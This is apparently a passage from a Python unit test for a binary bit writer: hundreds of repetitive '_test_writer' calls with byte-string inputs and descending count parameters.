_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 53, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 52, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 51, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 50, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 49, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 48, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 47, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 46, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 45, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 44, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 43, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 42, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 41, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 40, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 39, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 38, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 37, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 36, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 35, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 34, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 33, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 32, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 31, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 30, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 29, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 28, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 27, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 26, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 25, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 24, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 23, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 22, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 21, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 20, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 19, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 18, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 17, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 16, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 15, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 14, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 13, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 12, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 11, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 10, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 9, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 8, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 7, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 6, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 5, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 4, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 3, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 2, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 1, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 64, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 63, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 62, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 61, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 60, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 59, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 58, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 57, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 56, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 55, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 54, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 53, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 52, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 51, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 50, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 49, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 48, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 47, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 46, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 45, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 44, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 43, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 42, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 41, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 40, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 39, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 38, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 37, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 36, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 35, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 34, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 33, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 32, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 31, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 30, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 29, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 28, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 27, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 26, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 25, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 24, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 23, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 22, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 21, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 20, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 19, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 18, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 17, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 16, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 15, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 14, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 13, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 12, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 11, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 10, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 9, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 8, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 7, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 6, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 5, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 4, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 3, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 2, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 1, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 64, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 63, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 62, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 61, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 60, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 59, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 58, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 57, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 56, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 55, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 54, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 53, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 52, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 51, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 50, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 49, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 48, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 47, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 46, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 45, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 44, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 43, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 42, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 41, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 40, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 39, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 38, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 37, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 36, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 35, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 34, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 33, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 32, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 31, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 30, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 29, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 28, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 27, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 26, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 25, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 24, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 23, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 22, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 21, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 20, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 19, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 18, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 17, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 16, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 15, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 14, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 13, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 12, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 11, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 10, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 9, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 8, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 64, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 63, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 62, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 61, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 60, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 59, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 58, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 57, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 56, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 55, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 54, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 53, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 52, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 51, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 50, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 49, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 48, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 47, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 46, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 45, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 44, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 43, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 42, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 41, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 40, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 39, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 38, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 37, False, 1)
